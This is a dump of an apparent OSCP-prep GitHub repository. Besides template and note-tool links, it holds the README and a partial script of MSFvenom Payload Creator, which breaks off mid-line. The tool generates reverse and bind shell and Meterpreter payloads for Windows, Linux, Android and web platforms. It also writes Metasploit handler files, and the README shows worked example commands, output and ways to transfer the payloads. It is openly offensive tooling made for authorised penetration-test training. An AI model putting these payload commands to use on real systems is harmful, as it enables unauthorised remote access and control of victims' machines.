├── Exam Report Templates └── README.md ├── Note Taking Tools ├── CherryTree Template │ ├── CTF_template.ctb │ └── README.md ├── Dradis Framework │ ├── README.md │ └── dradis-ce_compliance_package-oscp.v0.3.zip ├── Joplin Templates │ └── README.md └── README.md ├── Payload Generators ├── MSFVenom Payload Creator │ ├── LICENSE │ ├── README.md │ └── msfpc.sh └── Rev Shell (Windows) │ ├── .gitignore │ ├── .idea │ ├── encodings.xml │ ├── misc.xml │ ├── modules.xml │ ├── rev.iml │ ├── vcs.xml │ └── workspace.xml │ ├── README.md │ ├── makefile │ ├── reciever.py │ └── rev.c ├── README.md └── Reconnaissance └── Port-Service Scans ├── README.md ├── smbver.sh └── udp_scan.pl /Exam Report Templates/README.md: -------------------------------------------------------------------------------- 1 | # Markdown Templates 2 | * [Noraj OSCP-Exam-Report-Template-Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) 3 | 4 | # Microsoft Office/LibreOffice 5 | * [OffSec Official Microsoft Office Template](https://www.offsec.com/pwk-online/OSCP-Exam-Report.docx) 6 | * [OffSec Official LibreOffice Template](https://www.offsec.com/pwk-online/OSCP-Exam-Report.odt) 7 | * [whoisflynn OSCP Exam Report Template](https://github.com/whoisflynn/OSCP-Exam-Report-Template) 8 | * -------------------------------------------------------------------------------- /Note Taking Tools/CherryTree Template/CTF_template.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzspy/oscp-certification/5c52b987c745b149552fddb58c43b94d98423db3/Note Taking Tools/CherryTree Template/CTF_template.ctb -------------------------------------------------------------------------------- /Note Taking Tools/CherryTree Template/README.md: -------------------------------------------------------------------------------- 1 | # CTF_Template 2 | A template created by James Hall ( https://411hall.github.io/OSCP-Preparation/ ) for note taking for CTFs/OSCP 3 | -------------------------------------------------------------------------------- /Note Taking Tools/Dradis Framework/README.md: -------------------------------------------------------------------------------- 1 | # Dradis Framework 2 | This is the reporting template for the Dradis Framework for the OSCP Certification 3 | -------------------------------------------------------------------------------- /Note Taking Tools/Dradis Framework/dradis-ce_compliance_package-oscp.v0.3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzspy/oscp-certification/5c52b987c745b149552fddb58c43b94d98423db3/Note Taking Tools/Dradis Framework/dradis-ce_compliance_package-oscp.v0.3.zip -------------------------------------------------------------------------------- /Note Taking Tools/Joplin Templates/README.md: -------------------------------------------------------------------------------- 1 | * [tjnull's Joplin OSCP Template](https://github.com/tjnull/TJ-JPT) -------------------------------------------------------------------------------- /Note Taking Tools/README.md: -------------------------------------------------------------------------------- 1 | # Note Taking Tools 2 | 3 | Below is a list of note taking tools one can use. If there is a template or some file required for download, please see the appropriate folder for it. Otherwise, click the links below for whatever tool interests you the most 4 | 5 | ## Frameworks 6 | * [Dradis](https://dradis.com/academy/industry/compliance/oscp/) 7 | * [sysreptor](https://github.com/Syslifters/sysreptor) 8 | * [SimplE RePort wrIting and COllaboration(serpico) tool](https://github.com/SerpicoProject/Serpico) - Archived by author 9 | 10 | ## Applications 11 | * [KeepNote](https://keepnote.org/) - More or less deprecated, use CherryTree 12 | * [CherryTree](https://www.giuspen.net/cherrytree/) 13 | * [Notion](https://www.notion.so/) 14 | * [Joplin](https://joplinapp.org/) 15 | * [Obsidian](https://obsidian.md/) -------------------------------------------------------------------------------- /Payload Generators/MSFVenom Payload Creator/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 g0tmi1k 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /Payload Generators/MSFVenom Payload Creator/README.md: -------------------------------------------------------------------------------- 1 | Original link: https://github.com/g0tmi1k/msfpc 2 | 3 | ## MSFvenom Payload Creator (MSFPC) 4 | 5 | A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework). 6 | 7 |

8 | msfpc logo 9 |

10 | 11 | 12 | - - - 13 | 14 | 15 | ## About 16 | 17 | MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. 18 | 19 | **Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MSFPC itself)_. 20 | The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_). 21 | 22 | The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`). 23 | 24 | * **Can't remember your IP for a interface? Don't sweat it, just use the interface name**: `eth0`. 25 | * **Don't know what your external IP is? MSFPC will discover it**: `wan`. 26 | * **Want to generate one of each payload? No issue!** Try: `loop`. 27 | * **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)! 28 | 29 | _Note: This will **NOT** try to bypass any anti-virus solutions at any stage._ 30 | 31 | ![Msfvenom Payload Creator (MSFPC)](https://i.imgur.com/tN9q5iG.png) 32 | 33 | 34 | - - - 35 | 36 | 37 | ## Install 38 | 39 | + Designed for **Kali Linux v2.x/Rolling** & **Metasploit v4.11+**. 40 | + Kali v1.x should work. 41 | + OSX 10.11+ should work. 42 | + Weakerth4n 6+ should work. 43 | + _...nothing else has been tested._ 44 | 45 | ``` 46 | $ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc 47 | $ chmod 0755 /usr/local/bin/msfpc 48 | ``` 49 | 50 | ### Kali-Linux 51 | 52 | MSFPC is already [packaged](https://pkg.kali.org/pkg/msfpc) in [Kali Rolling](https://www.kali.org/), so all you have to-do is: 53 | 54 | ```bash 55 | root@kali:~# apt install -y msfpc 56 | ``` 57 | 58 | 59 | 60 | - - - 61 | 62 | 63 | ## Help 64 | 65 | ``` 66 | $ bash msfpc.sh -h -v 67 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 68 | 69 | msfpc.sh () () () () () () () () 70 | Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP. 71 | msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port. 72 | msfpc.sh stageless cmd py https # Python, stageless command prompt. 73 | msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP. 74 | msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP. 75 | msfpc.sh help verbose # Help screen, with even more information. 76 | 77 | : 78 | + APK 79 | + ASP 80 | + ASPX 81 | + Bash [.sh] 82 | + Java [.jsp] 83 | + Linux [.elf] 84 | + OSX [.macho] 85 | + Perl [.pl] 86 | + PHP 87 | + Powershell [.ps1] 88 | + Python [.py] 89 | + Tomcat [.war] 90 | + Windows [.exe // .dll] 91 | 92 | Rather than putting , you can do a interface and MSFPC will detect that IP address. 93 | Missing will default to the IP menu. 94 | 95 | Missing will default to 443. 96 | 97 | is a standard/native command prompt/terminal to interactive with. 98 | is a custom cross platform shell, gaining the full power of Metasploit. 99 | Missing will default to where possible. 100 | Note: Metasploit doesn't (yet!) support for every format. 101 | payloads are generally smaller than and easier to bypass EMET. Limit Metasploit post modules/scripts support. 102 | payloads are generally much larger than , as it comes with more features. 103 | 104 | opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target. 105 | makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target. 106 | Missing will default to . 107 | allows for the attacker to connect whenever they wish. needs to the target to be repeatedly connecting back to permanent maintain access. 108 | 109 | splits the payload into parts, making it smaller but dependent on Metasploit. 110 | is the complete standalone payload. More 'stable' than . 111 | Missing will default to where possible. 112 | Note: Metasploit doesn't (yet!) support for every format. 113 | are 'better' in low-bandwidth/high-latency environments. 114 | are seen as 'stealthier' when bypassing Anti-Virus protections. may work 'better' with IDS/IPS. 115 | More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads 116 | https://www.offensive-security.com/metasploit-unleashed/payload-types/ 117 | https://www.offensive-security.com/metasploit-unleashed/payloads/ 118 | 119 | is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs. 120 | makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80. 121 | makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443. 122 | will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on . 123 | Missing will default to . 124 | By altering the traffic, such as and even more , it will slow down the communication & increase the payload size. 125 | More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication 126 | 127 | will generate as many combinations as possible: , , , & 128 | will just create one of each . 129 | 130 | will display more information. 131 | $ 132 | ``` 133 | 134 | 135 | ## Example \#1 (Windows, Fully Automated Using Manual IP) 136 | 137 | ```bash 138 | $ bash msfpc.sh windows 192.168.1.10 139 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 140 | [i] IP: 192.168.1.10 141 | [i] PORT: 443 142 | [i] TYPE: windows (windows/meterpreter/reverse_tcp) 143 | [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \ 144 | --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \ 145 | > '/root/windows-meterpreter-staged-reverse-tcp-443.exe' 146 | 147 | [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe' 148 | 149 | [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' 150 | [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' 151 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 152 | [*] Done! 153 | $ 154 | ``` 155 | 156 | 157 | ## Example \#2 (Linux Format, Fully Automated Using Manual Interface and Port) 158 | 159 | ```bash 160 | $ ./msfpc.sh elf bind eth0 4444 verbose 161 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 162 | [i] IP: 192.168.103.142 163 | [i] PORT: 4444 164 | [i] TYPE: linux (linux/x86/shell/bind_tcp) 165 | [i] SHELL: shell 166 | [i] DIRECTION: bind 167 | [i] STAGE: staged 168 | [i] METHOD: tcp 169 | [i] CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \ 170 | --platform linux -a x86 -e generic/none LPORT=4444 \ 171 | > '/root/linux-shell-staged-bind-tcp-4444.elf' 172 | 173 | [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf' 174 | 175 | [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size 176 | [i] Size: 4.0K 177 | [i] MD5: eed4623b765eea623f2e0206b63aad61 178 | [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185 179 | 180 | [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc' 181 | [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc' 182 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 183 | [*] Done! 184 | $ 185 | ``` 186 | 187 | 188 | ## Example \#3 (Python Format, Interactive IP Menu) 189 | 190 | ```bash 191 | $ msfpc stageless cmd py tcp 192 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 193 | 194 | [i] Use which interface - IP address?: 195 | [i] 1.) eth0 - 192.168.103.142 196 | [i] 2.) lo - 127.0.0.1 197 | [i] 3.) wan - 31.204.154.174 198 | [?] Select 1-3, interface or IP address: 1 199 | 200 | [i] IP: 192.168.103.142 201 | [i] PORT: 443 202 | [i] TYPE: python (python/shell_reverse_tcp) 203 | [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \ 204 | --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \ 205 | > '/root/python-shell-stageless-reverse-tcp-443.py' 206 | 207 | [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py' 208 | 209 | [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' 210 | [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc' 211 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 212 | [*] Done! 213 | $ 214 | ``` 215 | 216 | _Note: Removed WAN IP._ 217 | 218 | 219 | ## Example \#4 (Loop - Generates one of everything) 220 | 221 | ```bash 222 | $ ./msfpc.sh loop wan 223 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 224 | [i] Loop Mode. Creating one of each TYPE, with default values 225 | 226 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 227 | [i] IP: xxx.xxx.xxx.xxx 228 | [i] PORT: 443 229 | [i] TYPE: android (android/meterpreter/reverse_tcp) 230 | [i] CMD: msfvenom -p android/meterpreter/reverse_tcp \ 231 | LHOST=xxx.xxx.xxx.xxx LPORT=443 \ 232 | > '/root/android-meterpreter-stageless-reverse-tcp-443.apk' 233 | 234 | [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk' 235 | 236 | [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc' 237 | [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc' 238 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 239 | [*] Done! 240 | 241 | 242 | [*] MSFvenom Payload Creator (MSFPC v1.4.4) 243 | 244 | ...SNIP... 245 | 246 | [*] Done! 247 | 248 | $ 249 | ``` 250 | 251 | _Note: Removed WAN IP._ 252 | 253 | 254 | ![Examples](https://i.imgur.com/8zPx6p3.png) 255 | 256 | 257 | - - - 258 | 259 | 260 | ## To-Do List 261 | 262 | * Shellcode generation 263 | * x64 payloads 264 | * IPv6 support 265 | * Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_ 266 | -------------------------------------------------------------------------------- /Payload Generators/MSFVenom Payload Creator/msfpc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #-Metadata----------------------------------------------------# 3 | # Filename: msfpc.sh (v1.4.5) (Update: 2019-02-18) # 4 | #-Info--------------------------------------------------------# 5 | # Quickly generate Metasploit payloads using msfvenom. # 6 | #-Author(s)---------------------------------------------------# 7 | # g0tmilk ~ https://blog.g0tmi1k.com/ # 8 | #-Operating System--------------------------------------------# 9 | # Designed for & tested on: Kali Rolling & Metasploit v4.11+ # 10 | # Reported working: OSX 10.11+ & Kali Linux 1.x/2.x # 11 | #-Licence-----------------------------------------------------# 12 | # MIT License ~ http://opensource.org/licenses/MIT # 13 | #-Notes-------------------------------------------------------# 14 | # Requires: # 15 | # Metasploit Framework v4.11.3-2015062101 or higher # 16 | # --- # 17 | # Useful Manual Commands: # 18 | # msfvenom --list payloads # 19 | # msfvenom --list encoders # 20 | # msfvenom --help-formats # 21 | # --- # 22 | # Reminder about payload names: # 23 | # shell_bind_tcp - Single / Inline / NonStaged / Stageless # 24 | # shell/bind_tcp - Staged (Requires Metasploit) # 25 | #-Known Bugs--------------------------------------------------# 26 | # [BATCH/LOOP] The script must have the executable flag set # 27 | # [BATCH] Will not generate DLL files # 28 | #-------------------------------------------------------------# 29 | 30 | #--Quick Install----------------------------------------------# 31 | # curl -k -L "https://raw.githubusercontent.com/g0tmi1k/msfpc/master/msfpc.sh" > /usr/bin/msfpc; chmod +x /usr/bin/msfpc 32 | #-------------------------------------------------------------# 33 | 34 | #-More information--------------------------------------------# 35 | # - https://www.offensive-security.com/metasploit-unleashed/payloads/ 36 | # - https://www.offensive-security.com/metasploit-unleashed/payload-types/ 37 | # - https://www.offensive-security.com/metasploit-unleashed/msfvenom/ 38 | # - https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads 39 | # - https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom 40 | # - https://community.rapid7.com/community/metasploit/blog/2014/12/09/good-bye-msfpayload-and-msfencode 41 | # - https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom 42 | #-------------------------------------------------------------# 43 | 44 | 45 | #-Defaults----------------------------------------------------# 46 | 47 | 48 | ##### Variables 49 | OUTPATH="$( pwd )/" # Others: ./ /tmp/ /var/www/ 50 | 51 | ##### (Cosmetic) Colour output 52 | RED="\033[01;31m" # Issues/Errors 53 | GREEN="\033[01;32m" # Success/Asking for Input 54 | YELLOW="\033[01;33m" # Warnings/Information 55 | BLUE="\033[01;34m" # Heading 56 | BOLD="\033[01;01m" # Highlight 57 | RESET="\033[00m" # Normal 58 | 59 | ##### Read command line arguments 60 | TYPE="" #"$( echo ${1} | \tr '[:upper:]' '[:lower:]' )" Defalut: *REQUIRED* 61 | IP="" #"${2}" Defalut: *IP menu* 62 | PORT="" #"${3}" Deafult: 443 63 | SHELL="" # shell // meterpreter Default: meterpreter 64 | DIRECTION="" # reverse // bind Default: reverse 65 | STAGE="" # staged // stageless Default: stageless 66 | METHOD="" # tcp // http // https // find_port Default: tcp 67 | VERBOSE=false 68 | 69 | ##### Default values 70 | SUCCESS=false # Did we successfully create a payload? 71 | DOMAIN=false # IP address or domain name? 72 | BATCH=false # Are we creating multiple payloads (one of each type) ? 73 | LOOP=false # Are we creating multiple payloads (every possible combination)? 74 | HELP=false # Display the help screen? 75 | DARWIN=false # In case of OSX users 76 | 77 | ##### (Optional) Enable debug mode? 78 | #set -x 79 | 80 | 81 | #-Function----------------------------------------------------# 82 | 83 | ## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL DIRECTION STAGE METHOD VERBOSE 84 | function doAction { 85 | TYPE="${1}" 86 | IP="${2}" 87 | PORT="${3}" 88 | PAYLOAD="${4}" 89 | CMD="${5}" 90 | FILEEXT="${6%-service}" 91 | SHELL="${7}" 92 | DIRECTION="${8}" 93 | STAGE="${9}" 94 | METHOD="${10}" 95 | VERBOSE="${11}" 96 | 97 | if [[ -z "${VERBOSE}" ]]; then 98 | echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}: doAction TYPE(${TYPE}) IP(${IP}) PORT(${PORT}) PAYLOAD(${PAYLOAD}) CMD(${CMD}) FILEEXT(${FILEEXT}) SHELL(${SHELL}) DIRECTION(${DIRECTION}) STAGE(${STAGE}) METHOD(${METHOD}) VERBOSE(${VERBOSE})" >&2 99 | exit 2 100 | fi 101 | 102 | FILENAME="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" 103 | FILEHANDLE="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}-${FILEEXT}.rc" 104 | 105 | X=" IP" 106 | [[ "${DOMAIN}" == "true" ]] \ 107 | && X='NAME' 108 | [[ "${VERBOSE}" == "true" ]] \ 109 | && PADDING=' ' 110 | 111 | echo -e " ${YELLOW}[i]${RESET}${PADDING} ${X}: ${YELLOW}${IP}${RESET}" 112 | echo -e " ${YELLOW}[i]${RESET}${PADDING} PORT: ${YELLOW}${PORT}${RESET}" 113 | echo -e " ${YELLOW}[i]${RESET}${PADDING} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})" 114 | if [[ "${VERBOSE}" == "true" ]]; then 115 | echo -e " ${YELLOW}[i]${RESET} SHELL: ${YELLOW}${SHELL}${RESET}" 116 | echo -e " ${YELLOW}[i]${RESET} DIRECTION: ${YELLOW}${DIRECTION}${RESET}" 117 | echo -e " ${YELLOW}[i]${RESET} STAGE: ${YELLOW}${STAGE}${RESET}" 118 | echo -e " ${YELLOW}[i]${RESET} METHOD: ${YELLOW}${METHOD}${RESET}" 119 | fi 120 | echo -e " ${YELLOW}[i]${RESET}${PADDING} CMD: ${BOLD}${CMD}${RESET}" 121 | echo "" 122 | 123 | CMD=$( echo $CMD | sed 's/\\\\\n//g' ) 124 | 125 | [[ -e "${FILENAME}" ]] \ 126 | && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. ${YELLOW}Overwriting...${RESET}" \ 127 | && rm -f "${FILENAME}" 128 | eval "${CMD}" 2>/tmp/msfpc.out 129 | [[ ! -s "${FILENAME}" ]] \ 130 | && rm -f "${FILENAME}" 131 | if [[ -e "${FILENAME}" ]]; then 132 | echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'" 133 | echo "" 134 | \chmod +x "${FILENAME}" 135 | else 136 | echo "" 137 | \grep -q 'Invalid Payload Selected' /tmp/msfpc.out 2>/dev/null 138 | if [[ "$?" == '0' ]]; then 139 | echo -e "\n ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2 140 | \rm -f /tmp/msfpc.out 141 | else 142 | echo -e "\n ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." >&2 143 | echo -e "\n----------------------------------------------------------------------------------------" 144 | [ -e "/usr/share/metasploit-framework/build_rev.txt" ] \ 145 | && \cat /usr/share/metasploit-framework/build_rev.txt \ 146 | || \msfconsole -v 147 | \uname -a 148 | echo -e "----------------------------------------------------------------------------------------${RED}" 149 | \cat /tmp/msfpc.out 150 | echo -e "${RESET}----------------------------------------------------------------------------------------\n" 151 | fi 152 | exit 2 153 | fi 154 | #\rm -f /tmp/msfpc.out 155 | 156 | if [[ "${VERBOSE}" == "true" ]]; then 157 | echo -e " ${YELLOW}[i]${RESET} File: $( \file -b ${FILENAME} )" 158 | echo -e " ${YELLOW}[i]${RESET} Size: $( \du -h ${FILENAME} | \cut -f1 )" 159 | echo -e " ${YELLOW}[i]${RESET} MD5: $( \openssl md5 ${FILENAME} | \awk '{print $2}' )" 160 | echo -e " ${YELLOW}[i]${RESET} SHA1: $( \openssl sha1 ${FILENAME} | \awk '{print $2}' )" 161 | echo -e "" 162 | fi 163 | 164 | HOST="LHOST" 165 | [[ "${DIRECTION}" == "bind" ]] \ 166 | && HOST="RHOST" 167 | 168 | cat < "${FILEHANDLE}" 169 | # 170 | # [Kali]: msfdb start; msfconsole -q -r '${FILEHANDLE}' 171 | # 172 | use exploit/multi/handler 173 | set PAYLOAD ${PAYLOAD} 174 | set ${HOST} ${IP} 175 | set LPORT ${PORT} 176 | set ExitOnSession false 177 | set EnableStageEncoding true 178 | #set AutoRunScript 'post/windows/manage/migrate' 179 | run -j 180 | EOF 181 | 182 | echo -e " ${YELLOW}[i]${RESET} MSF handler file: '${FILEHANDLE}'" 183 | echo -e " ${YELLOW}[i]${RESET} Run: msfconsole -q -r '${FILEHANDLE}'" 184 | #echo -e " ${YELLOW}[i]${RESET} MSF command: msfconsole -x \"use exploit/multi/handler; \\\\\n set PAYLOAD ${PAYLOAD}; \\\\\n set ${HOST} ${IP}; \\\\\n set LPORT ${PORT}; \\\\\n set ExitOnSession false; \\\\\n run -j\"" 185 | SUCCESS=true 186 | return 187 | } 188 | 189 | ## doHelp 190 | function doHelp { 191 | echo -e "\n ${BLUE}${0}${RESET} <${BOLD}TYPE${RESET}> (<${BOLD}DOMAIN/IP${RESET}>) (<${BOLD}PORT${RESET}>) (<${BOLD}CMD/MSF${RESET}>) (<${BOLD}BIND/REVERSE${RESET}>) (<${BOLD}STAGED/STAGELESS${RESET}>) (<${BOLD}TCP/HTTP/HTTPS/FIND_PORT${RESET}>) (<${BOLD}BATCH/LOOP${RESET}>) (<${BOLD}VERBOSE${RESET}>)" 192 | echo -e " Example: ${BLUE}${0} windows 192.168.1.10${RESET} # Windows & manual IP." 193 | echo -e " ${BLUE}${0} elf bind eth0 4444${RESET} # Linux, eth0's IP & manual port." 194 | echo -e " ${BLUE}${0} stageless cmd py https${RESET} # Python, stageless command prompt." 195 | echo -e " ${BLUE}${0} verbose loop eth1${RESET} # A payload for every type, using eth1's IP." 196 | echo -e " ${BLUE}${0} msf batch wan${RESET} # All possible Meterpreter payloads, using WAN IP." 197 | echo -e " ${BLUE}${0} help verbose${RESET} # Help screen, with even more information." 198 | echo "" 199 | echo -e " <${BOLD}TYPE${RESET}>:" 200 | echo -e " + ${YELLOW}APK${RESET}" 201 | echo -e " + ${YELLOW}ASP${RESET}" 202 | echo -e " + ${YELLOW}ASPX${RESET}" 203 | echo -e " + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}]" 204 | echo -e " + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}]" 205 | echo -e " + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}]" 206 | echo -e " + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}]" 207 | echo -e " + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}]" 208 | echo -e " + ${YELLOW}PHP${RESET}" 209 | echo -e " + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}]" 210 | echo -e " + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}]" 211 | echo -e " + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]" 212 | echo -e " + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET} // .${YELLOW}exe${RESET} // .${YELLOW}dll${RESET}]" 213 | echo "" 214 | echo -e " Rather than putting , you can do a interface and MSFPC will detect that IP address." 215 | echo -e " Missing will default to the IP menu." 216 | echo "" 217 | echo -e " Missing will default to 443." 218 | echo "" 219 | echo -e " is a standard/native command prompt/terminal to interactive with." 220 | echo -e " is a custom cross platform shell, gaining the full power of Metasploit." 221 | echo -e " Missing will default to where possible." 222 | if [[ "${VERBOSE}" == "true" ]]; then 223 | echo -e " Note: Metasploit doesn't (yet!) support for every format." 224 | echo -e " payloads are generally smaller than and easier to bypass EMET. Limit Metasploit post modules/scripts support." 225 | echo -e " payloads are generally much larger than , as it comes with more features." 226 | fi 227 | echo "" 228 | echo -e " opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target." 229 | echo -e " makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target." 230 | echo -e " Missing will default to ." 231 | [[ "${VERBOSE}" == "true" ]] \ 232 | && echo -e " allows for the attacker to connect whenever they wish. needs to the target to be repeatedly connecting back to permanent maintain access." 233 | echo "" 234 | echo -e " splits the payload into parts, making it smaller but dependent on Metasploit." 235 | echo -e " is the complete standalone payload. More 'stable' than ." 236 | echo -e " Missing will default to where possible." 237 | if [[ "${VERBOSE}" == "true" ]]; then 238 | echo -e " Note: Metasploit doesn't (yet!) support for every format." 239 | echo -e " are 'better' in low-bandwidth/high-latency environments." 240 | echo -e " are seen as 'stealthier' when bypassing Anti-Virus protections. may work 'better' with IDS/IPS." 241 | echo -e " More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads" 242 | echo -e " https://www.offensive-security.com/metasploit-unleashed/payload-types/" 243 | echo -e " https://www.offensive-security.com/metasploit-unleashed/payloads/" 244 | fi 245 | echo "" 246 | echo -e " is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs." 247 | echo -e " makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80." 248 | echo -e " makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443." 249 | echo -e " will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on ." 250 | echo -e " Missing will default to ." 251 | if [[ "${VERBOSE}" == "true" ]]; then 252 | echo -e " By altering the traffic, such as and even more , it will slow down the communication & increase the payload size." 253 | echo -e " More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication" 254 | fi 255 | echo "" 256 | echo -e " will generate as many combinations as possible: , , , & " 257 | echo -e " will just create one of each ." 258 | echo "" 259 | echo -e " will display more information." 260 | exit 1 261 | } 262 | 263 | 264 | #-Start-------------------------------------------------------# 265 | 266 | 267 | ## Banner 268 | echo -e " ${BLUE}[*]${RESET} ${BLUE}MSF${RESET}venom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MSFPC${RESET} v${BLUE}1.4.5${RESET})" 269 | 270 | 271 | ## Check system 272 | ## Are we using Linux or OSX? 273 | if [[ "$( \uname )" != "Linux" ]] && [[ "$( \uname )" != "Darwin" ]]; then 274 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}You're not using Unix-like OS${RESET}" >&2 275 | exit 3 276 | elif [[ "$( \uname )" = "Darwin" ]]; then 277 | DARWIN=true 278 | fi 279 | 280 | ## msfvenom installed? 281 | if [[ ! -n "$( \which msfvenom )" ]]; then 282 | echo -e " 